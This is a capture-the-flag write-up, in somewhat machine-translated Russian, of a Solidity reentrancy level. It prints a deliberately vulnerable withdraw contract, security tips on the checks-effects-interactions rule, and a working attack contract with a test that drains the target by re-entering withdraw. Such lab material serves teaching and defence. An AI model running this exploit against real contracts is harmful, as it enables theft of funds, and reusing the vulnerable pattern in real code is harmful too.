УРОВЕНЬ 10 (Реентранс):
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import '@openzeppelin/contracts/math/SafeMath.sol';
contract Reentrance {
using SafeMath for uint256;
mapping(address => uint) public balances;
function donate(address _to) public payable {
balances[_to] = balances[_to].add(msg.value);
}
function balanceOf(address _who) public view returns (uint balance) {
return balances[_who];
}
function withdraw(uint _amount) public {
if(balances[msg.sender] >= _amount) {
//(bool result,) = msg.sender.call{value:_amount}("");
//原文是上面这行,在0.6是无法编译的,修改为下面这行
(bool result,) = msg.sender.call.value(_amount)("");
if(result) {
_amount;
}
balances[msg.sender] -= _amount;
}
}
receive() external payable {}
}
Требования к сдаче экзамена
Возьмите баланс контракта на освещение
Ключевые моменты
Атака с повторным входом: метод, в котором вызывается внешний метод, и внешний метод вызывает этот метод, создавая проблему безопасности
https://medium.com/coinmonks/protect-your-solidity-smart-contracts-from-reentrancy-attacks-9972c3af7c21
Советы по безопасности
1. блокировка внешних методов
2. строго следовать принципу «проверка-следствие-взаимодействие».
проверять условие -> изменять переменную/состояние -> взаимодействовать (выполнять действие)
Взаимодействие должно быть на последнем месте
правила проверки-следствия-взаимодействия очень важны, приобретите хорошие привычки!!!
Идеи решения
1. написать контракт в получении, а затем позвонить и отозвать для повторного поступления
contracts/10ReentranceRun.js
function run(address _levelAddress) external payable {
levelAddress = _levelAddress;
donateAmount = msg.value;
ILevel(levelAddress).donate{value:donateAmount}(address(this));
ILevel(levelAddress).withdraw(donateAmount);
}
//重入withdraw
receive() external payable {
uint256 levelBalance = payable(levelAddress).balance;
if (msg.sender == levelAddress && levelBalance !=0 ) {
ILevel(levelAddress).withdraw(donateAmount>levelBalance?levelBalance:donateAmount);
}
}
test/10Reentrance.js
it("attacks", async function () {
await runContract.connect(player).run(levelContract.address, {
value: ethers.utils.parseEther("0.5"),
});
});